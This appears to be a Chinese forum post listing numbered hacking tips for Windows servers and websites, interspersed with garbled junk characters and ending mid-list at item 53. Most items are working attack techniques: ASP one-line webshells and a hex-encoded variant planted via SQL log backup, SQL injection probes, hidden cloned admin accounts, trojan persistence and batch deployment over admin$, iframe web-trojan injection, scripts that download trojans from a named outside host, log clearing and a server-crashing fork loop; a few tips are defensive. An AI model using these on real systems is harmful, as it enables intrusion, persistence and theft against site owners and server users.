Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 [. p' P% Z) L, j/ tcacls C:\windows\system32 /G hqw20:R
/ I. X& G$ F" r2 w思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入+ `9 Y w" l. P8 [) ~
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
5 W; ^5 T! Z- Q- X- S* j* ^5 t- X, j% u9 I- d( T; @
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 i& p* o. T! l, S# E) e, S7 _- p# g4 X8 j: y: P8 x: q
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
6 }9 z1 k3 C6 V$ R8 F; G
: K1 |+ M6 i. d, J4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号# G# A0 S% z" e7 {
7 t3 j3 d& X- w/ c ~
5、利用INF文件来修改注册表
& l. ?: g: Q# d8 N% O[Version]& R# K0 [7 B+ R
Signature="$CHICAGO$": F' m! _# T! U4 D
[Defaultinstall]
1 e5 q& D; e1 l4 m7 NaddREG=Ating8 B( {+ A7 g: d. r9 \
[Ating]
" h$ p- q( A# q# b a# y3 MHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"7 [: j Z/ A2 X
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:$ x' y; ]; u# F r8 n) B+ g
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径4 E @7 \" U' q" C
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU/ K T3 x. _3 Q+ J8 s; W: R7 {
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU+ t6 W9 {" o) N$ ?) e5 |( f7 h
HKEY_CURRENT_CONFIG 简写为 HKCC
$ l- }5 b8 {" _0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
9 ~* @( W4 j2 m* a @: Q2 a"1"这里代表是写入或删除注册表键值中的具体数据
% m1 y/ X0 ?* s3 Z
* q8 u4 t* p9 f: M+ u0 S1 X6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,- b! C E9 G6 P2 K6 l5 j
多了一步就是在防火墙里添加个端口,然后导出其键值
, H! R% e" x) `9 m; J' V[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]" \- z* { P! o, O# @7 G8 A/ @
/ l# @/ k+ o1 x& t7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
6 z- r. u ^9 Q. x1 H4 R" E在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。" t% h! o& ?- m" ]. d: [
3 O/ N+ T% {# X
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。$ H' E# Q" `8 E2 G7 D- A& w
) I. ?- h* _* g. j
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,! x, ` s: Y B$ a! J1 r% u1 p
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。6 S+ ?. r/ h" U' b: K0 u
5 h9 }- V9 H5 U/ i7 ]/ Y10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; M) \( v! h4 ~2 `) O# ^
3 M8 a! ~1 [0 f7 k, O11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
l5 g' c* }7 @用法:xsniff –pass –hide –log pass.txt# h) ]0 v" N% |4 E- ~. E
2 X# x' Q( I* x2 P6 h
12、google搜索的艺术
0 O3 J8 J/ b6 D9 Q4 f$ J _( A4 X搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
, h; Q0 [: h' D" s* q) N: R& H3 w或“字符串的语法错误”可以找到很多sql注入漏洞。0 b0 T% ~: F' N
2 p4 I8 L3 H1 r. a9 V5 T13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- s0 F6 B/ @. I5 C% ^8 y) ]
" ?, l4 J; H$ I$ }6 E9 S9 v14、cmd中输入 nc –vv –l –p 1987
, V& q; Z, Z, x% ~2 z7 S做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
( F; g$ T+ L5 P, m& z# B% W U$ j$ G" [
15、制作T++木马,先写个ating.hta文件,内容为7 U% r2 a0 ]+ S# j, k8 P/ {
<script language="VBScript">
2 @: R$ z5 \/ E0 U O) e1 Iset wshshell=createobject ("wscript.shell" )
# h: o0 D3 o( x4 }a=wshshell.run("你马的名称",1)# C( ?1 H( E, Y; I* K
window.close9 W8 e" u; g' t
</script>8 G) Z. b) w) S; d+ U1 V
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ ?* T6 Y2 m; X( N, X% O O! Z# Y9 K$ e- k
16、搜索栏里输入& J l. c% M A: W3 V
关键字%'and 1=1 and '%'='
9 }6 U [# |. z6 ~2 P关键字%'and 1=2 and '%'='7 M$ s; } r% g3 K( Z& ?2 ?! S: z
比较不同处 可以作为注入的特征字符0 X0 A' |) `" i7 c* D4 w
' {5 j( H4 y+ l3 t8 A x, V7 Q- Y17、挂马代码<html>
2 \- Z; ^: ]7 O2 V<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
2 V2 H( G* t* I</html>
+ S* n. _- y9 _8 e! y% ]1 ^
v! Q& g$ V2 m' i2 S4 p18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
. @2 I% B- K2 l" K2 i: f1 nnet localgroup administrators还是可以看出Guest是管理员来。% @ ` V, d, a" u ^( V# h# j* _
, U# Z( p$ }, [/ X3 A1 j) s$ W. j, S6 {
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 J. g% A; O0 M: i* n用法: 安装: instsrv.exe 服务名称 路径. c/ i& u0 E* K3 M
卸载: instsrv.exe 服务名称 REMOVE
a7 z# y9 }/ S. p
, i* r+ c' V+ N9 C' ]4 Q
. a+ }: G: K( [4 d21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉7 P. d' S. _' [) T$ ]% k
不能注入时要第一时间想到%5c暴库。
2 l' }/ K$ u6 F
. b9 j/ b& S& h: h( k9 L1 S22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
# L0 U; ` i: S- E1 ~+ R5 p4 ?- Z8 N, C$ D' [
23、缺少xp_cmdshell时
% T4 ]: F$ D* q9 e6 N+ N尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( P1 i! E6 F" c, Z
假如恢复不成功,可以尝试直接加用户(针对开3389的)
( k, i. E8 w% C6 q- ydeclare @o int* |1 [! n2 o" M2 C0 m# n4 {
exec sp_oacreate 'wscript.shell',@o out" T- }/ O( X5 Y6 g1 P6 a
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
2 l% z: t* x) f& A) J
6 ~6 B: }8 j7 y3 C. O4 b$ ^24.批量种植木马.bat2 k* Z: D5 T" J; P7 ~1 s. r; d2 h8 Y
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中& U; `+ E7 E' u; p6 I1 N i
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
7 g( N: v0 x( A6 u! B% y扫描地址.txt里每个主机名一行 用\\开头/ U+ n2 b) d% A% E% \
6 `; z* r/ n: B8 e, \" {+ X25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
0 n. P1 \& i! {. P1 C8 i7 F, `. N: ^
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
6 V( A0 |: v6 \5 t将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
' A* m' I# o% ~, j' f: D, e.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
' ]; A0 }+ ]# P& g. t4 N/ z2 n
' A$ j- H1 ~0 {. T27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
& Q% }/ b8 R( y( S然后用#clear logg和#clear line vty *删除日志 P _+ B" d% H+ r
) E2 j- ]- V# D0 U' R1 m
28、电脑坏了省去重新安装系统的方法0 R. q1 r4 t$ F: j' L* M3 w
纯dos下执行,7 I0 e7 e1 k# q( `7 u
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
! T2 g8 `1 `+ t. s% Q' o* H2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
: M6 ^$ N+ d# y8 \+ E8 m
3 J e2 t4 V" A/ t+ O29、解决TCP/IP筛选 在注册表里有三处,分别是:; r8 m l* y" D D3 G$ [
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip0 X8 x ]& _+ `- o8 B+ m4 `
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- y2 P: C% X v5 E3 \$ r
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
" V$ [6 ^( q: V9 v分别用
7 i. k6 b1 Y& eregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 ?2 K0 v' z& }9 G3 t
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( z9 I1 n0 f9 V/ E5 f6 b: B cregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% b# v, j* w. f; a0 Q命令来导出注册表项, a) o0 _+ f; F5 a1 ?
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
' | f, e# O* X改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
# |* W3 b {2 qregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。$ D& p1 x/ Z' c0 R/ i2 z( L
' O$ x4 ~9 S |
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U% a @* L# K8 W0 o5 d7 j
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
{ Q' g) Z6 D: a! H2 e
7 ] u# v1 j( Q( J31、全手工打造开3389工具
+ i4 E+ ?% j0 I+ q3 \; G1 r打开记事本,编辑内容如下:
. V8 R& E$ N# M7 n; Y" oecho [Components] > c:\sql8 l& u* |( @2 g! o& I( I
echo TSEnable = on >> c:\sql7 t; V/ J) ^2 k, f* P$ P6 i
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q5 H2 g4 R2 V: Z; ^0 G; s5 S
编辑好后存为BAT文件,上传至肉鸡,执行
, @2 v Z4 d0 q8 u- P4 j6 F0 K" I1 g7 V( O1 g7 z
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马2 m7 Q& l; z! e d. G
1 q" ^5 B2 a4 P4 g. }7 r" I33、让服务器重启) X; @6 ?8 n2 R1 n
写个bat死循环:. E7 j7 K% I* b5 \6 n2 r
@echo off( ]# l, J; f9 q E7 a
:loop15 E) C/ f* x% N& P
cls: F! B1 Q. q7 D
start cmd.exe" k+ m8 t9 F1 j3 ?+ ~ J- `* [
goto loop1
F$ c* F9 D6 U8 I0 ~: G1 h保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启" B$ n" Y& i6 p$ t, B4 i6 f2 z* H
9 A" B3 o9 V0 z* @- n' k; i# G: M
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
- T, K' f5 @2 a. }. f@echo off/ w# P0 [) m, W
date /t >c:/3389.txt) O8 R* E1 j5 {
time /t >>c:/3389.txt
- n8 x9 e& P2 \' P, R5 fattrib +s +h c:/3389.bat
, T8 P5 P9 P4 O" s1 G xattrib +s +h c:/3389.txt
0 r# Y/ p7 L. @2 K9 F8 Vnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% g/ T% ^6 E6 T5 i0 v并保存为3389.bat2 j. n( y& u4 W5 {/ F5 _- \
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# G3 [0 T, y: V6 D; u; y& X0 _* [8 m2 M+ R
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
# T) [" x1 H. e+ a- @/ ?. Y! U$ lstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
" g3 D8 h; Y( F4 ^7 u3 j( Y; h输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。/ G4 T( p5 `8 i- M
! _5 \; l- u1 A$ b4 G
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) g7 d% j' N' y4 ~echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址3 A& \; i3 w8 D8 N$ O
echo 你的FTP账号 >>c:\1.bat //输入账号4 D5 m/ c+ E8 V
echo 你的FTP密码 >>c:\1.bat //输入密码- ]# S" h, x+ h4 v
echo bin >>c:\1.bat //登入
+ s+ U* V* }7 L& k% qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么% B/ w0 d* ~& C
echo bye >>c:\1.bat //退出
" \2 p$ w# q$ U9 |6 R" T% k然后执行ftp -s:c:\1.bat即可9 z3 D) e% b4 b# Z; H
& c! O$ Q7 w8 G1 U( i37、修改注册表开3389两法6 Z3 Q3 O1 F1 a
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表6 S; e) B: s$ e
echo Windows Registry Editor Version 5.00 >>3389.reg
: Q* z7 @9 }8 ]; H6 i; _, l+ Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg. N, Q! M) {- @! ]' Z9 Y
echo "Enabled"="0" >>3389.reg
( M' o' H( ?$ W$ Y* R9 ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows! S3 {8 K9 a: W3 C. W
NT\CurrentVersion\Winlogon] >>3389.reg5 ]& C# O/ H. d7 C5 b1 ~
echo "ShutdownWithoutLogon"="0" >>3389.reg* |* J% R: {" s- l7 q P X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]/ I+ ]) u, k- G1 m" N2 N
>>3389.reg
j7 G- f+ s: t0 z7 R5 Fecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 V, `5 P6 G, O; b# ?5 uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]9 e( b p- Z/ }& O& l1 r5 q3 b
>>3389.reg" g* c) a6 U. H, Y5 W( t5 v
echo "TSEnabled"=dword:00000001 >>3389.reg+ s- O f2 @3 g; x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg1 Y3 i b' Y5 Z4 C
echo "Start"=dword:00000002 >>3389.reg9 A/ p1 C4 G5 I4 q& `, G2 I3 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]: [' N( v% K8 N6 f
>>3389.reg( t$ f3 Y H3 v/ l8 b5 |
echo "Start"=dword:00000002 >>3389.reg
3 b" m) p4 R$ |5 }/ qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ ^0 H. e+ T" j" S! wecho "Hotkey"="1" >>3389.reg% N# m. B' O2 y1 B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 h4 b( g" }' j; |* c7 wServer\Wds\rdpwd\Tds\tcp] >>3389.reg
- _9 Z# N. p, r# ~8 ]9 iecho "PortNumber"=dword:00000D3D >>3389.reg
8 K% T2 i. ]0 u, K: V5 Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' K s6 s* r2 B2 g0 U m
Server\WinStations\RDP-Tcp] >>3389.reg0 i& A8 K0 [7 H* n
echo "PortNumber"=dword:00000D3D >>3389.reg3 K3 N1 H+ I3 v: S
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
8 \, q- M( C) V0 k: f% {5 d; \, O(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
8 L! n; ?" |+ \2 F因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效: y1 h0 F0 E6 v5 q0 F0 J. f9 N
(2)winxp和win2003终端开启6 E) R' L+ w8 ]9 O
用以下ECHO代码写一个REG文件:
9 W; O/ T" q& U( d# q' e$ K. e9 Y& oecho Windows Registry Editor Version 5.00>>3389.reg
+ c6 o# ?8 `* S1 C8 m5 x5 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ \( ], D; F8 e, A, k! QServer]>>3389.reg+ J; S* H4 I; A0 n& `
echo "fDenyTSConnections"=dword:00000000>>3389.reg
7 \/ s, l" O, w4 Y$ lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! \5 D3 i1 A! Z" Y! I
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
d8 U7 t$ w/ zecho "PortNumber"=dword:00000d3d>>3389.reg
/ k" y( B/ |) C! J+ Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 K: G( d# y O! x& x G. {6 M: q) S
Server\WinStations\RDP-Tcp]>>3389.reg3 g7 V8 l% [. ~5 {8 I
echo "PortNumber"=dword:00000d3d>>3389.reg/ w! k2 {% j$ W' Q I) r: d
然后regedit /s 3389.reg del 3389.reg2 a* {8 a/ [3 q
XP下不论开终端还是改终端端口都不需重启
8 g, u/ k; ?6 j( z4 V
. P1 P) X ]: J! K) @5 Q/ {38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃1 r7 b1 _9 E9 Z+ U& R L& N1 v& R
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
( ]5 g, |1 J+ B/ {% n. h' v; ~
2 s; k. E2 R7 L2 F- ^5 J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!" ~" N4 l0 u+ V: g5 r
(1)数据库文件名应复杂并要有特殊字符0 e& f. B$ L) v& w- `9 d3 C( `
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源2 c% l! V$ q7 M" ]1 i, d0 c
将conn.asp文档中的
( `# m, D% w* X( U/ J5 qDBPath = Server.MapPath("数据库.mdb")
( S1 ^1 \5 c& J9 p+ r2 d# nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath8 K6 {2 v6 [7 [9 [5 z' g7 i
8 l. J/ l0 _& D' q L
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
& V9 G1 a: D$ c1 R(3)不放在WEB目录里
/ M" p+ u. M% @6 O4 a# k/ X5 ?& W+ z% C( l1 q) b, ]" Z" J! h, N" V
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉* |) ]/ v, L$ \, G+ |
可以写两个bat文件1 @7 f* L0 N6 a3 h: f! K: Q
@echo off/ z" @. a" {7 j6 T
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
0 o2 u3 \* e# T@del c:\winnt\system32\query.exe
, n5 @2 B+ a" T1 V5 }6 I) t3 G- _@del %SYSTEMROOT%\system32\dllcache\query.exe. |5 b. |+ M E6 M1 W& ~$ Z \
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的% V8 R2 v j$ F/ X
6 \/ v3 p' x3 \5 U@echo off" s8 d2 D$ V# z6 L$ ] `! |6 C
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
7 R3 M. G5 U$ y- f p- a8 J@del c:\winnt\system32\tsadmin.exe8 V) m- `, @ z) L6 K
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex4 f" C6 w4 b) @7 Z' X2 |# Z7 n
' N6 Q% b6 Z4 b' t8 _41、映射对方盘符2 ?7 _" ~5 A! @; H+ C
telnet到他的机器上,! D) ~) n" F, [7 K a0 m- l3 c: K/ b
net share 查看有没有默认共享 如果没有,那么就接着运行
- g' q& x/ G, i+ }1 rnet share c$=c:
1 Z5 y" u% k0 P2 Bnet share现在有c$( @1 S* h; Z: y. m3 A+ n
在自己的机器上运行
( v4 b8 A a6 G; o7 O% t$ W+ A7 o3 wnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K y. n! F: J2 J) h% C
( c/ V- i" @% r. x42、一些很有用的老知识
/ U* f. ~2 h' y! otype c:\boot.ini ( 查看系统版本 )
# X" A$ p9 t9 m( z2 ?net start (查看已经启动的服务)
& I3 I: b3 y7 C: lquery user ( 查看当前终端连接 )0 f4 [: [ i$ \5 L8 b3 z" r
net user ( 查看当前用户 )
( I: N9 F7 k/ D/ Q0 t! ~net user 用户 密码/add ( 建立账号 )
: l4 z& q0 H; ^net localgroup administrators 用户 /add (提升某用户为管理员)
6 t$ w/ X$ F3 u) i% _ipconfig -all ( 查看IP什么的 )
" O4 _4 X$ B1 unetstat -an ( 查看当前网络状态 ). V3 ?; V+ z5 {# z0 ]& C1 \
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
* z/ m& v1 d* r克隆时Administrator对应1F4' p1 V; a5 h+ L: C7 ?
guest对应1F5- Q* [# C; R7 R( y% T
tsinternetuser对应3E8% j. x' s) K6 R4 C
" w2 A. |4 ?7 `: O% D/ p43、如果对方没开3389,但是装了Remote Administrator Service% x* T5 _, G' ?" L. g/ @6 j
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 c+ N- k0 b# h$ z解释:用serv-u漏洞导入自己配制好的radmin的注册表信息' n1 O7 {4 _. T* p0 u
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin") K0 a9 M s8 r2 [) P$ C
. T( I1 H ^( D6 X9 `, O$ x
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
' P6 C" L; P; I8 \8 z本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
' S0 X ~% M) |: ]) `* A
6 t. g; w- z" Q4 g, `7 B& O- _* V45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)' D% Q) x% j6 A2 A/ d* f& o
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open& A9 o; x& h/ L' I2 ]7 h
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =: h1 ^6 K4 @# Q5 E. J( y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
4 `: J" k& w) U& n1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs3 V0 u3 O2 _9 C, i9 c$ @2 [
(这是完整的一句话,其中没有换行符)
A# |$ ?& H* K: }9 [' j# Z% k" P然后下载:
0 a8 `. i( E) P4 kcscript down.vbs http://www.hack520.org/hack.exe hack.exe* Y# s( ^/ f( I+ R
; E3 y0 s1 ]1 x
46、一句话木马成功依赖于两个条件:2 G; H0 T6 o% o$ {7 V9 _- a' I
1、服务端没有禁止adodb.Stream或FSO组件
6 M, C- m- ?& C$ `3 Q2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
* J9 G' ?, P6 k9 X, o: S. b: R, W9 h' }4 t$ M
47、利用DB_OWNER权限进行手工备份一句话木马的代码:; p( C; P* t! s0 ?6 S6 L
;alter database utsz set RECOVERY FULL--
2 g$ C' G/ d( b' p) P0 F; X$ H;create table cmd (a image)--# E7 v% i- L3 O3 U5 ?5 ^' s
;backup log utsz to disk = 'D:\cmd' with init--
/ Y* X4 K! l8 Q/ {0 ?& ^8 e;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--- P) G- s! V8 M4 Z- X) y
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
3 E; L5 B [ U/ N* i: G& I4 `' F% l注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
& s2 l/ n( X. F
S& Z# @' r7 z0 o T1 f/ r$ {" a48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
5 q* `+ N' E8 j8 k# X& s+ E) j- }
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
5 w! d3 y# I2 {: Z1 a4 Y4 t所有会话用 'all'。
/ Q- c" I" U9 U! V: o-s sessionid 列出会话的信息。
7 Q( u7 W L. `' J/ }) |-k sessionid 终止会话。
) p E T9 S# J# h6 x) K m0 e-m sessionid 发送消息到会话。: a0 m3 M* \) v7 v# M/ K
. w {1 [/ w" V4 c# ^ |
config 配置 telnet 服务器参数。+ H) J) ?) h# f' z- ?
: Q0 p( y- l2 }; x. Z
common_options 为:
' i8 ?0 |1 r$ l. b7 s' l! j- W-u user 指定要使用其凭据的用户; G4 u( c* ]& J! `8 j$ _
-p password 用户密码$ \6 ?0 c0 N3 i) ?1 i
6 K9 p e% e0 h& \config_options 为:
6 O2 P+ x( U. ?) w% ^dom = domain 设定用户的默认域
! R0 ?' q( {- K# I1 U: Wctrlakeymap = yes|no 设定 ALT 键的映射7 J/ @" |- v- C8 o
timeout = hh:mm:ss 设定空闲会话超时值+ w$ N7 r( |$ W. P2 @5 g5 K
timeoutactive = yes|no 启用空闲会话。
& S3 s7 Y9 k2 H" emaxfail = attempts 设定断开前失败的登录企图数。8 o6 V1 I+ y e8 C" m* k2 s
maxconn = connections 设定最大连接数。
4 J0 `' } [0 Q* Eport = number 设定 telnet 端口。0 N) E/ X8 }* |/ Q
sec = [+/-]NTLM [+/-]passwd
# k6 R4 z- r& M5 s+ X* l# x设定身份验证机构
6 O7 t7 O: a& p7 u; Xfname = file 指定审计文件名。
8 L9 C3 M; x+ g+ _0 f$ j! p% q# Kfsize = size 指定审计文件的最大尺寸(MB)。
& g0 V! y0 W& o, Omode = console|stream 指定操作模式。) I+ k- K) r! ^; B" b3 j
auditlocation = eventlog|file|both
& ` e- @& z$ p+ W8 g+ A7 |9 t' d指定记录地点4 K) c- j1 v% w
audit = [+/-]user [+/-]fail [+/-]admin
4 S7 x4 q' `3 e4 k8 X) x
, I6 l; ], F) F- B1 f* ~# p49、例如:在IE上访问:0 Q( ~+ A# }2 d; S0 ]
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/; G! u% G4 h1 w, f3 I6 K
hack.txt里面的代码是:
# c9 N; C1 B! V( n# k& K" y<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
1 @% R% {$ F6 N" c- z) {* t把这个hack.txt发到你空间就可以了!
$ I$ d1 W, o2 L0 v这个可以利用来做网马哦!8 O! A# ^/ l; I' j% b; v
2 I8 g# W* \4 m4 W; k+ |' w
50、autorun的病毒可以通过手动限制!
9 }, r# }/ d# \. L( a! | t- n# a1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!/ h( A( s7 Z) g) F
2,打开盘符用右键打开!切忌双击盘符~
4 z; ?9 m8 L% x7 _2 s; z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!7 @/ b0 c7 B4 E) _& j6 F& A
& T; [: B4 k# G
51、log备份时的一句话木马:2 |9 T5 F: Q+ [3 H, |: ?
a).<%%25Execute(request("go"))%%25>( x- C3 O+ y+ n) o! T) Q
b).<%Execute(request("go"))%>
9 j7 K# j4 e3 |/ B9 i- Nc).%><%execute request("go")%><%
* m }9 d! ?5 l ?d).<script language=VBScript runat=server>execute request("sb")</Script> L6 L* p5 K* ^! N9 N; u
e).<%25Execute(request("l"))%25>3 V9 g L4 W0 C x
f).<%if request("cmd")<>"" then execute request("pass")%>- j7 ]- \8 r( b& N% D3 s6 U
2 H( n/ M# s4 K$ K52、at "12:17" /interactive cmd4 P2 W* ]2 o; [ `7 z
执行后可以用AT命令查看新加的任务
4 C( ~! e6 K% L- J用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。2 I, m* ?/ V6 V7 W7 Z8 Z
( f( ]9 n) ` \* C
53、隐藏ASP后门的两种方法
